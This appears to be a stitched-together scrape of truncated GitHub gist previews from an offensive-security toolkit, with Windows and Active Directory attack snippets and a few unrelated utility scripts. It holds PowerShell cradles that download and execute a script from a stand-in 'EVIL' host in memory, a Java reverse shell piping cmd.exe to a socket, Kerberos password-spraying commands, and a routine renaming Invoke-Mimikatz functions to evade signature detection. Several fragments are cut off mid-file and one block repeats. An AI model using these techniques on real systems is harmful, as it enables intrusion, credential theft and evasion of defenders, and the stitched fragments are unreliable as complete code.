With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
| # Three equivalent "download cradles": each fetches evil.ps1 over plaintext HTTP and passes the body straight to IEX (Invoke-Expression), | |
| # so the script content is executed from memory and never written to disk. From a monitoring standpoint that means file-based scanning | |
| # never sees it; visibility comes from PowerShell script-block logging and from the outbound HTTP request itself. | |
| # normal download cradle | |
| # WebClient.DownloadString returns the response body as a single string, which IEX evaluates. | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| # iwr is the alias for Invoke-WebRequest; IEX coerces the response object to its content string. | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| # Drives an invisible InternetExplorer.Application COM instance: navigate, wait a fixed 5 s for the page to load, | |
| # read Document.body.innerHTML, quit the instance, then IEX the captured text. The fixed sleep is a race: | |
| # a slow fetch leaves $r empty or partial. Note the request is made by the IE process, not by powershell.exe. | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
| String host="localhost"; | |
| int port=8044; | |
| String cmd="cmd.exe"; | |
| Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
| #DISCLAIMER | |
| #I'm not the original author of the script... | |
| #Original git repo vanished | |
| function String-to-ByteArray ($String) | |
| { | |
| $ByteArray=@() | |
| For ( $i = 0; $i -lt ($String.Length/2); $i++ ) | |
| { | |
| $Chars=$String.Substring($i*2,2) |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
| # Downloads Invoke-Mimikatz.ps1 into the current directory (wget default output name), then rewrites it in place: | |
| # strips PowerShell block comments (<# ... #>) and line comments, and renames two function identifiers. | |
| # Requires GNU sed: bare `-i` (no suffix) is a GNU-ism; BSD/macOS sed needs `-i ''`. | |
| # Defender note: the DumpCerts/DumpCreds renames below show why detection should not key on those literal names alone. | |
| wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
| # Uncomment below two lines to clean comments from all .ps1 files in ./ | |
| #find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \; | |
| #find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \; | |
| # Delete every line from one starting with '<#' through the next line starting with '#>' (block comment). | |
| sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1 | |
| # Truncate each line at its first '#'. This is not comment-aware: a '#' inside a string literal is cut too. | |
| sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1 | |
| # GNU sed accepts the expression attached directly to -e; a space after -e would be the conventional form. | |
| sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1 |
| # twitterfavlinks.py - Throw back all your favorites that contain a url. Get any applicable redirects. Note there are Twitter API | |
| # limits, so if you have a gazillion favorites, you probably won't get them all. YMMV | |
| # | |
| # Author: @curi0usJack | |
| # | |
| # Dependencies: | |
| # Tweepy: sudo pip install tweepy | |
| # Twitter API access. Set up here: https://apps.twitter.com/ | |
| import tweepy |
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| # Save this file into something like /etc/apache2/redirect.rules. | |
| # Then in your site's apache conf file (in /etc/apache2/sites-available/), put this statement somewhere near the bottom | |
| # | |
| # Include /etc/apache2/redirect.rules | |
| # |
| #!/bin/bash | |
| # Nmap can crash when scanning large ranges | |
| # To use this script, start your scan with whatever | |
| # nmap options you want making sure you use -oA <filename> | |
| # or -oG <filename> (you need the gnmap file) then cancel | |
| # the scan. replace <filename> below and run this script. | |
| # It will also record when it failed to a file called failed.txt | |
| until nmap --resume <filename>.gnmap |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
| #!/usr/bin/env python | |
| # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. | |
| # | |
| # A similar approach to smbexec but executing commands through WMI. | |
| # Main advantage here is it runs under the user (has to be Admin) | |
| # account, not SYSTEM, plus, it doesn't generate noisy messages |